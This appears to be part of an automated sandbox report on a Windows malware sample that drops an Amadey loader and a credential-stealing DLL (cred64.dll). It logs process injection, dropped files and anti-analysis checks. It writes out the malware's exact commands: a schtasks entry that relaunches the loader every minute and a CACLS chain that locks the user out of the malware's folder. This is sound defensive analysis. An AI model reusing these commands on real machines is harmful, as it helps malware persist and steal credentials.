                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey,0_2_00402693
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004015D5
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401602
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401605
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401609
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401613
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_00401617
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004015D4
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004015E0
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004015EA
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004015EE
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00402693 NtOpenKey,NtEnumerateKey,NtEnumerateKey,11_2_00402693
                              Source: kmxId0uLRn.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: thgcici.1.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                              Source: 8F68.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
                              Source: kmxId0uLRn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to behavior
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@51/18@28/6
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: kmxId0uLRn.exeReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeVirustotal: Detection: 60%
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\kmxId0uLRn.exe C:\Users\user\Desktop\kmxId0uLRn.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exe
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\thgcici C:\Users\user\AppData\Roaming\thgcici
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8F68.exe C:\Users\user\AppData\Local\Temp\8F68.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9545.exe C:\Users\user\AppData\Local\Temp\9545.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /EJump to behavior
                              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F68.tmpJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1568
                              Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\ec3ccaac0e84032af3ffe6a4a2668066
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeMutant created: \Sessions\1\BaseNamedObjects\bf045808586a2473c5a7441da6f3bfa9
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: kmxId0uLRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
                              Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeUnpacked PE file: 0.2.kmxId0uLRn.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Roaming\thgciciUnpacked PE file: 11.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Roaming\thgciciUnpacked PE file: 43.2.thgcici.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C120E0 push eax; ret 12_2_00C1228B
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C370DD push esi; ret 12_2_00C370E6
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C350F9 push esp; ret 12_2_00C350FA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351FF push ebp; ret 12_2_00C3522A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3519C push ebp; ret 12_2_00C351A2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351A8 push ebp; ret 12_2_00C351AA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351AC push ebp; ret 12_2_00C351B2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351B4 push ebp; ret 12_2_00C351BA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C351BC push ebp; ret 12_2_00C351C2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35147 push esp; ret 12_2_00C3514A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35101 push esp; ret 12_2_00C35102
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3511C push esp; ret 12_2_00C3512A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3512F push esp; ret 12_2_00C35132
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35134 push esp; ret 12_2_00C3513A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3513F push esp; ret 12_2_00C35142
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352C7 push ebp; ret 12_2_00C352CA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352CF push ebp; ret 12_2_00C352D2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352D4 push ebp; ret 12_2_00C352DA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352E1 push esi; ret 12_2_00C352E2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352F4 push esi; ret 12_2_00C352FA
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352FC push esi; ret 12_2_00C35302
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3529C push ebp; ret 12_2_00C352A2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352A4 push ebp; ret 12_2_00C352B2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C352B4 push ebp; ret 12_2_00C352C2
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35274 push ebp; ret 12_2_00C3529A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3522F push ebp; ret 12_2_00C3523A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35358 push edi; ret 12_2_00C35372
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35374 push edi; ret 12_2_00C3537A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C35304 push esi; ret 12_2_00C3530A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3530C push esi; ret 12_2_00C3531A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3531C push edi; ret 12_2_00C3537A

                              Persistence and Installation Behavior

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F68.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeFile created: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thgciciJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeFile created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJump to dropped file
                              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9545.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\kmxid0ulrn.exeJump to behavior
                              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\thgcici:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                              Source: C:\Users\user\AppData\Roaming\thgciciKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
